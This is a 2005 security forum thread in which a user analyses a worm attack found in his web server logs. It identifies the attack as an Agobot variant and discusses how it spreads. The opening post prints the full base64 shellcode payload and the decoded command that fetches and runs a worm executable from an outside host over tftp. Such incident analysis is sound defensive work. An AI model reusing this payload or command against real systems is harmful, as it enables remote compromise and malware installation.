Author Topic: Short exploit investigation...  (Read 5587 times)

0 Members and 1 Guest are viewing this topic.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Short exploit investigation...
« on: June 09, 2005, 06:41:12 pm »
I was looking at my Snort logs (although this would also be seen in Apache's logs) and found this string repeated many times, more each day for the last 4 days, showing up as an attempted overflow:

Code: [Select]
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDE0Mi4xNjEuNjYuNDggR0VUIHd1YW1rb3AuZXhlJnN0YXJ0IHd1YW1rb3AuZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQiMKAwgA+A8BAPgP
This was coming from all over, and looks like an exploit.  Something that doesn't belong.  So I whip out my trusty base64 decoder and run it through (because a lot of it is in hex, I ran it through strings to pull out any strings):

Code: [Select]
AAAAAAAAAAAAAAAAAAAAAAAAA
ÄTòÿÿüèF
ëã.I
Âëô;T$
Ã1Àd
h<_1ö`Vë
hïÎà`h
Wÿçèîÿÿÿcmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#

What is looks like is some shellcode that runs the command:
cmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit

Which is:
Run cmd, with the command tftp (an ftp client) which gets wuamkop.exe, runs it, and ends the program.  (NOTE: I added the x at the end of the IP, just to prevent potential mishaps with people running that command and getting infected :P)

A quick google on that filename turns up:
http://www.liutilities.com/products/wintaskspro/processlibrary/wuamkop/

Which says:
Process File: wuamkop or wuamkop.exe
Process Name: WORM_AGOBOT Variant

Conclusion: It's a AGOBOT worm/trojan spreading itself using a web server vulnerability.  I'm not sure which server is vulnerable but, being a .exe, it's not mine (it's a Windows worm) :)

Hope that somebody found that neresting.

Offline Quik

  • Webmaster Guy
  • x86
  • Hero Member
  • *****
  • Posts: 3262
  • \x51 \x75 \x69 \x6B \x5B \x78 \x38 \x36 \x5D
    • View Profile
Re: Short exploit investigation...
« Reply #1 on: June 09, 2005, 06:52:25 pm »
There was a post on bugtraq about this, maybe security-basics. Let me see if I can find the corresponding thread.

[EDIT]: Nevermind, it was on Incidents, and there is no online log of those threads as far as I can find. It does seem like there's a new Windows server exploit like this going around.
« Last Edit: June 09, 2005, 07:00:04 pm by Quik »
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Short exploit investigation...
« Reply #2 on: June 09, 2005, 06:54:15 pm »
It was on "incidents".  And that is a sdbot variant, this is agobot.  Same exploit, though

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Short exploit investigation...
« Reply #3 on: June 12, 2005, 02:37:52 pm »
Here are a couple graphs of this attack:

The number of times it hit me, by hour:
http://www.javaop.com/~iago/worm_analysis_byhour.html

The number of times it hit me, by day:
http://www.javaop.com/~iago/worm_analysis_byday.html

As you can see, it's only really been around since the 6th, and it looks like it already peaked.  In another week, I'll see how it looks again.

Offline deadly7

  • 42
  • x86
  • Hero Member
  • *****
  • Posts: 6496
    • View Profile
Re: Short exploit investigation...
« Reply #4 on: June 13, 2005, 10:42:37 am »
Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.
[17:42:21.609] <Ergot> Kutsuju you're girlfrieds pussy must be a 403 error for you
 [17:42:25.585] <Ergot> FORBIDDEN

on IRC playing T&T++
<iago> He is unarmed
<Hitmen> he has no arms?!

on AIM with a drunk mythix:
(00:50:05) Mythix: Deadly
(00:50:11) Mythix: I'm going to fuck that red dot out of your head.
(00:50:15) Mythix: with my nine

Offline Krazed

  • x86
  • Hero Member
  • *****
  • Posts: 1822
    • View Profile
Re: Short exploit investigation...
« Reply #5 on: June 13, 2005, 10:59:57 am »
Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.

Well, it's spreading itself along the internet. Most likely just selecting random IPs along a specified subnet, and attempting to exploit each machine, then skipping to the next.
It is good to be good, but it is better to be lucky.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Short exploit investigation...
« Reply #6 on: June 13, 2005, 02:02:53 pm »
Yeah, I'm assuming it's just a plain worm.  It randomly either picks an ip or, like Archon said, scans a subnet.

Offline mynameistmp

  • Full Member
  • ***
  • Posts: 111
  • Hi! I'm new here!
    • View Profile
Re: Short exploit investigation...
« Reply #7 on: June 14, 2005, 02:43:39 am »
What was your command-string that you used to run that through your decoder ?

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Short exploit investigation...
« Reply #8 on: June 14, 2005, 10:43:21 am »
It was pretty obvious that it was base64, and I discovered the easy way to decode that is mimencode -u.  I think you can also use uuencode somehow.

Offline GameSnake

  • News hound
  • Hero Member
  • *****
  • Posts: 2937
    • View Profile
Re: Short exploit investigation...
« Reply #9 on: August 16, 2005, 11:30:53 pm »
Interesting, is this an exploit in 1.02+?

How does the virus get to the point where it can reach the servers FTP - and why would I care if I was on Linux Red Hat Apache, I can control acess can't I, how does it exploit me. It uploads an exe and runs it too (right?).

Just curious becuase I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Short exploit investigation...
« Reply #10 on: August 17, 2005, 09:07:05 am »
Interesting, is this an exploit in 1.02+?

How does the virus get to the point where it can reach the servers FTP - and why would I care if I was on Linux Red Hat Apache, I can control acess can't I, how does it exploit me. It uploads an exe and runs it too (right?).

Just curious becuase I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.

You're making very little sense, but anyway, it's an IIS worm so Apache isn't affected.  I don't know what you mean by "1.02", Apache is vulnerable up to "1.3.26" or so.  There aren't any .exe's on Red Hat, so I wouldn't worry about that. 

Offline GameSnake

  • News hound
  • Hero Member
  • *****
  • Posts: 2937
    • View Profile
Re: Short exploit investigation...
« Reply #11 on: August 17, 2005, 01:34:49 pm »
nvm issued cleared up
« Last Edit: August 17, 2005, 08:29:01 pm by GameSnake »